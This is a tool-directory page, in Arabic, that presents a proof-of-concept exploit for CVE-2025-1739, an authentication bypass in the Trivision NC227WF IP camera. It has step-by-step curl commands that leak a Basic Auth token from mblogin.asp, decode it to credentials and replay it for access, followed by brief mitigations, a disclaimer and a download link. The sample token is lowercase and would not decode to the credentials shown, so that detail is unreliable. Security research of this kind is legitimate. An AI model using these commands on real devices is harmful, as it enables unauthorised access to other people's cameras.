Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
أدوات/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-1738 و CVE-2025-1739 — إثبات المفهوم لكاميرا Trivision NC227WF

📋 نظرة عامة

CVECVSS v3.1النتيجةCWEالنوع
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288تجاوز المصادقة عبر تسريب بيانات Basic Auth

🔓 CVE-2025-1739 — تسريب كود Basic Auth / تجاوز المصادقة (CWE-288)

الوصف

تسرّب الكاميرا رمز مصادقة Basic صالحًا ومشفّرًا بـ Base64 عبر نقطة النهاية mblogin.asp. يمكن فك ترميز هذا الرمز بسهولة وإعادة استخدامه للوصول غير المصرح به إلى الجهاز — دون الحاجة إلى معرفة كلمة المرور.

  • متجه الهجوم: الشبكة المجاورة (AV:A)
  • درجة CVSS: 7.1
  • CWE: CWE-288 (تجاوز المصادقة باستخدام مسار أو قناة بديلة)

الحمولة

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
صورة

مثال على الاستجابة

يحتوي الرد على رمز مصادقة Basic صالح:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

فك ترميز الرمز

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

إعادة استخدام الرمز

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ التخفيف

  • قم بترقية البرنامج الثابت (firmware) إذا كانت هناك نسخة مصححة متاحة من Trivision.
  • اعزل الكاميرا على شبكة VLAN مخصصة بدون وصول خارجي.
  • احمِ عبر جدار الحماية منفذ إدارة الكاميرا عن قطاعات الشبكة غير الموثوقة.
  • غيّر بيانات الاعتماد الافتراضية وبدّل كلمات المرور بانتظام.
  • راقب أي وصول غير متوقع إلى activex_pal.asp و mblogin.asp.

⚖️ إخلاء مسؤولية

هذا المستودع مخصص للأغراض التعليمية والبحث الأمني المصرح به فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام. احصل دائمًا على إذن صريح قبل اختبار أي جهاز.

تنزيل الأداة